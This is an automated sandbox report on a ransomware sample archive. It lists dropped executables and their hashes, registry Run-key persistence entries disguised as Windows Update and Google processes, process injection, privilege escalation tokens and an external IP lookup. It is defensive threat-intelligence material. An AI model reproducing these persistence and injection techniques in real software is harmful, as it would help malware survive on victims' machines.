Malware Analysis Report

2024-10-16 03:27

Sample ID 240910-wf31faxgqb
Target RNSM00486.7z
SHA256 4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23
Tags
discovery persistence upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23

Threat Level: Known bad

The file RNSM00486.7z was found to be: Known bad.

Malicious Activity Summary

discovery persistence upx

Blocklisted process makes network request

Executes dropped EXE

UPX packed file

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Modifies registry key

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-10 17:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-10 17:52

Reported

2024-09-10 17:56

Platform

win10v2004-20240802-en

Max time kernel

191s

Max time network

189s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zbhnd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\BD366504095.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\BD366504095.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RNSM00486\\00486\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe\"" C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hacker Man = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Google123.exe\"" C:\Users\Admin\AppData\Roaming\Google123.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\7D57AD13E21.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\7D57AD13E21.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\BD366504095.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Admin\\AppData\\Roaming\\smss.exe\"" C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5056 set thread context of 4828 N/A C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
PID 4480 set thread context of 2492 N/A C:\Users\Admin\AppData\Roaming\BD366504095.exe C:\Users\Admin\AppData\Roaming\BD366504095.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\zbhnd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\BD366504095.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\BD366504095.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Google123.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4372 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4372 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
PID 3020 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
PID 3020 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
PID 3020 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
PID 3020 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
PID 3020 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
PID 3020 wrote to memory of 4384 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
PID 3020 wrote to memory of 4384 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
PID 3020 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
PID 3020 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
PID 3020 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
PID 3020 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
PID 3020 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
